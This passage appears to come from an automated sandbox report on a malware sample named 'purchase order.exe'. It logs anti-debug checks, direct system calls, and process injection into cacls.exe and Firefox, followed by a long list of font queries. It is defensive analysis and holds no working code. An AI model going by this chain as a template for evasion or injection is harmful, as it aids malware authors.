                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015609AD mov eax, dword ptr fs:[00000030h]3_2_015609AD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015609AD mov eax, dword ptr fs:[00000030h]3_2_015609AD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590854 mov eax, dword ptr fs:[00000030h]3_2_01590854
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564859 mov eax, dword ptr fs:[00000030h]3_2_01564859
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564859 mov eax, dword ptr fs:[00000030h]3_2_01564859
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01572840 mov ecx, dword ptr fs:[00000030h]3_2_01572840
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE872 mov eax, dword ptr fs:[00000030h]3_2_015EE872
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE872 mov eax, dword ptr fs:[00000030h]3_2_015EE872
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6870 mov eax, dword ptr fs:[00000030h]3_2_015F6870
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6870 mov eax, dword ptr fs:[00000030h]3_2_015F6870
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC810 mov eax, dword ptr fs:[00000030h]3_2_015EC810
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160483A mov eax, dword ptr fs:[00000030h]3_2_0160483A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160483A mov eax, dword ptr fs:[00000030h]3_2_0160483A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A830 mov eax, dword ptr fs:[00000030h]3_2_0159A830
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov ecx, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\purchase order.exe Memory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: read write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cacls.exe Thread register set: target process: 6012
                Source: C:\Windows\SysWOW64\cacls.exe Thread APC queued: target process: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformation
                Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
